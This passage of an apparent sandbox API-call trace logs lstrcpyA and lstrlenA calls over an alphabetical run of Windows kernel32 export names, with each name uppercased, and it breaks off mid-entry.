[0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.252] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.252] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.252] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.252] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.252] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.252] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.252] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.253] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.253] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.253] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.253] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.253] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.253] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.253] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.253] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.253] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.253] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.253] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.253] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.253] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.253] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.253] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.253] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.253] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.253] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.253] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.254] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.255] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.255] lstrlenA (lpString="COPYFILEA") returned 9 [0082.255] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.255] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.255] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.255] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.255] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.255] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.255] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.255] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.255] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.255] lstrlenA (lpString="COPYFILEW") returned 9 [0082.255] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.255] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.255] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.255] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.255] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.255] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.255] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.255] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.255] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.256] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.256] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.256] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.256] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.256] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.256] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.256] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.256] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.256] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.256] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.256] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.256] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.256] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.256] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.256] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.256] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.256] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.256] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.256] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.257] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.257] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.257] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.257] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.257] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.257] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.257] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.257] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.257] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.257] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.257] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.257] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.257] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.257] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.257] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.257] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.257] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.257] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.257] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.257] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.258] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.258] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.258] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.258] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.258] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.258] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.258] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.258] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.258] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.258] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.258] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.258] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.258] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.258] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.258] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.258] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.258] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.258] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.258] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.259] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.259] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.259] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.259] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.259] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.259] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.259] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.259] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.259] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.259] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.259] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.259] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.259] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.259] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.259] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.259] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.259] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.259] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.259] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.260] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.260] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.260] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.260] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.260] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.260] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.260] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.260] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.260] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.260] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.260] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.260] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.260] lstrlenA (lpString="DELETEATOM") returned 10 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.260] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.260] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.260] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.260] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.260] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.260] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.260] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.261] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.261] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: 